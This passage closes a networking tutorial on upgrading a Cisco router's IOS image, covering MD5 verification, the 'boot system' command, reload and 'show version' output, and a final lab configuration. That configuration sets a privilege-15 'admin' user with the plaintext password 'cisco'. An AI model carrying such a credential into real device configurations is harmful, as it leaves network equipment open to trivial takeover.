R1#verify /md5 flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin. Done! verify /md5 (flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin) = fcdaeb55b292534e97ecc29a394d35aa

This MD5 checksum is the same as the one we found on the Cisco website. This tells us that we have the same file as Cisco published and that the file has not been tampered with. If the checksum fails, maybe someone has added something nasty to the image.

Boot System

Our router currently has two iOS images:

R1#show flash: | include.bin 8 67926080 Apr 2 2015 14:21:46 00:00 c2800nm-adventerprisek9-mz.151-4.M10.bin 25 67929600 Nov 4 2016 12:11:22 00:00 c2800nm-adventerprisek9-mz.151-4.M12a.bin

Which iOS image will it select when the router boots? Deleting the old iOS image is one option but there is another way.

Most routers will select the first filename that they find on the flash memory so in our case, it means it would boot the older iOS image. We can change this with the boot sytem command:

R1(config)#boot system flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin
R1#reload System configuration has been modified. Save? [yes/no]: yes Building configuration. [OK]

Once the router has reloaded, verify that we are running the new iOS image:

R1#show version Cisco iOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2016 by Cisco Systems, Inc. Compiled Tue 04-Oct-16 03:37 by prod_rel_team ROM: System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1) R1 uptime is 14 minutes System returned to ROM by reload at 14:01:00 UTC Fri Nov 4 2016 System image file is flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin

Above we can see we booted the new Cisco iOS image.

Want to take a look for yourself? Here you will find the final configuration of each device.

hostname R1 ! boot system flash:c2800nm-adventerprisek9-mz.151-4.M12a.bin ! ip cef ! ip domain name NETWORKLESSONS.LOCAL ! username admin privilege 15 password 0 cisco ! ip ssh version 2 IP scp server enable ! interface FastEthernet0/0 IP address 192.168.1.1 255.255.255.0 duplex auto speed auto ! line vty 0 4 login local transport input ssh ! end

Conclusion

You have now learned how to upgrade your Cisco iOS image through TFTP, FTP and SCP. You have seen how this can be done from your computer to your router/switch or between two routers. We also checked how to verify the integrity of the file with the MD5 checksum and how to configure your router to boot the new iOS image.